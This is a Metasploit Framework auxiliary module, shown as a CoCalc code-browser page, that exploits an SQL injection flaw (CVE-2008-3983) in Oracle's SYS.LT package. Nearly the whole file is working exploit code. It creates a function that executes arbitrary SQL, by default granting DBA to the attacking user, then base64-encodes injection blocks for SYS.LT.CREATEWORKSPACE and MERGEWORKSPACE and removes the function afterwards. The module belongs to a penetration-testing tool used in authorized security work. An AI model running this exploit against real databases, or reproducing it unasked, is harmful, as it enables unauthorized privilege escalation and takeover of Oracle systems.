CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE',

12
      'Description'    => %q{

13
        This module exploits a sql injection flaw in the MERGEWORKSPACE

14
        procedure of the PL/SQL package SYS.LT. Any user with execute

15
        privilege on the vulnerable package can exploit this vulnerability.

16
      },

17
      'Author'         => [ 'CG' ],

18
      'License'        => MSF_LICENSE,

19
      'References'     =>

20
        [

21
          [ 'CVE', '2008-3983'],

22
          [ 'OSVDB', '49325'],

23
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],

24
          [ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ]

25


26
        ],

27
      'DisclosureDate' => '2008-10-22'))

28


29
      register_options(

30
        [

31
          OptString.new('SQL', [ false, 'SQL to execte.',  "GRANT DBA to #{datastore['DBUSER']}"]),

32
        ])

33
  end

34


35
  def run

36
    return if not check_dependencies

37


38
    name  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

39
    rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

40
    rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

41
    rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

42
    cruft = Rex::Text.rand_text_alpha_upper(1)

43


44
    function = "

45
      CREATE OR REPLACE FUNCTION #{cruft}

46
      RETURN VARCHAR2 AUTHID CURRENT_USER

47
      AS

48
      PRAGMA AUTONOMOUS_TRANSACTION;

49
      BEGIN

50
      EXECUTE IMMEDIATE '#{datastore['SQL']}';

51
      COMMIT;

52
      RETURN '#{cruft}';

53
      END;"

54


55
    package1 = %Q|

56
      BEGIN

57
        SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');

58
      END;

59
      |

60


61
    package2 = %Q|

62
      BEGIN

63
        SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');

64
      END;

65
      |

66


67
    uno  = Rex::Text.encode_base64(function)

68
    dos  = Rex::Text.encode_base64(package1)

69
    tres = Rex::Text.encode_base64(package2)

70


71
    sql = %Q|

72
      DECLARE

73
      #{rand1} VARCHAR2(32767);

74
      #{rand2} VARCHAR2(32767);

75
      #{rand3} VARCHAR2(32767);

76
      BEGIN

77
      #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));

78
      EXECUTE IMMEDIATE #{rand1};

79
      #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));

80
      EXECUTE IMMEDIATE #{rand2};

81
      #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));

82
      EXECUTE IMMEDIATE #{rand3};

83
      END;

84
      |

85


86
    clean = "DROP FUNCTION #{cruft}"

87


88
    # Try first, if it's good.. keep doing the dance.

89
    print_status("Attempting sql injection on SYS.LT.MERGEWORKSPACE...")

90
    begin

91
      prepare_exec(sql)

92
    rescue => e

93
      return

94
    end

95


96
    print_status("Removing function '#{cruft}'...")

97
    prepare_exec(clean)

98


99
  end

100
end

101


102